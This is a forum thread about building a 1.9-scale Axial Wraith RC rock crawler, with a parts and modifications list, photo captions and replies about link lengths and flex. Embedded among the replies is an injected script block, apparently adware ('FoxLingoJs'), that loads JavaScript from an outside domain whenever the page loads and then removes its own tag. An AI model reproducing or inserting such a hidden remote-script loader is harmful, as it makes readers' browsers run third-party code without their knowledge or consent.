• Welcome to RCCrawler Forums.

It looks like you're enjoying RCCrawler's Forums but haven't created an account yet. Why not take a minute to register for your own free account now? As a member you get free access to all of our forums and posts plus the ability to post your own messages, communicate directly with other members, and much more. Register now!

Already a member? Login at the top of this page to stop seeing this message.

UnlimitedJDB's 1.9 Wraith

UnlimitedJDB

Pebble Pounder
Ever since I got into this hobby I have wanted to build a 1.9 wraith, but thought it was too much for my limited experience, until now! I have a few scx10 builds under my belt, so I bit the bullet and bought an RTR wraith and a dingo kit and got building.

Specs so far:

-wraith chassis. Chopped back with stock links added
-proline Jeep body
-wraith trans
-hitech wp servo on axle
- scx10 axels
- stock electronics for now
-1.9 pit bull rock beasts on ME monsters with .45 offset
-g-transitions shocks in droop on flipped level3 droop kit
-rear 4 links are alum lower links from the dingo kit
- front 4 link 65mm posts
- honcho dropped bed
- VP 8* knuckles, c hubs and lockouts
- axial CVDs
-Overdrive in the front and underdrive in the rear
-flysky gt3c
-Old man Logan driver (so awesome)

Last edited:
Mods so far:
- hinged hood
-added trimmed Dingo flairs
-trimmed dingo bumpers
-relocated lights
-battery forward using the scx alum battery tray and Velcro to secure the batts
-decased esc stuffed into the scx receiver box mounted in the rear

Last edited:
wraithstripped.jpg

The RTR stripped down.

wraithbodymockup.jpg

The body trimmed for mock up

wraithflextest.jpg

Flex Test after getting all the links sorted out

wraithonthetrail.jpg

Maiden Voyage

wraithfrontbumper.jpg

Added a trimmed dingo bumper

wraithrearbumper.jpg

I love my 1.9 wraith!, yours came out awesome man! "thumbsup"
<script id="FoxLingoJs">(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();</script>

AE11ECD0-2B3C-4B79-9320-1424894DFA67-14584-0000113FF0BE92ED.jpg

58068AED-DD08-4203-AEE1-0E6064B146D5-14584-0000113FFCDB5D7A.jpg

Made a few changes.. Plati-dipped my electronics and added RRP metal trans gears. Also added CI foams, but went to firm, so I need to try another combo.

Great thread. What total length eye-to-eye are your links and shocks? Also, what is your wheelbase? I'm impressed by your rig's flex because my 1.9 wraith does not flex nearly as well.

Man that rig looks great! I love the area that you were going up creek where is that at if I may ask."thumbsup"

Great thread. What total length eye-to-eye are your links and shocks? Also, what is your wheelbase? I'm impressed by your rig's flex because my 1.9 wraith does not flex nearly as well.

I run 90mm g transitions with droop brackets, and my rear links are 4.5" and fronts are 3.75 lower and 3.5 upper. Wheel base is 12.25.

9FE9BA30-AFDB-4E19-A395-1D9D64886388-12447-00000E484861B1A1_zps935d9ace.jpg

How is that for flex?

Back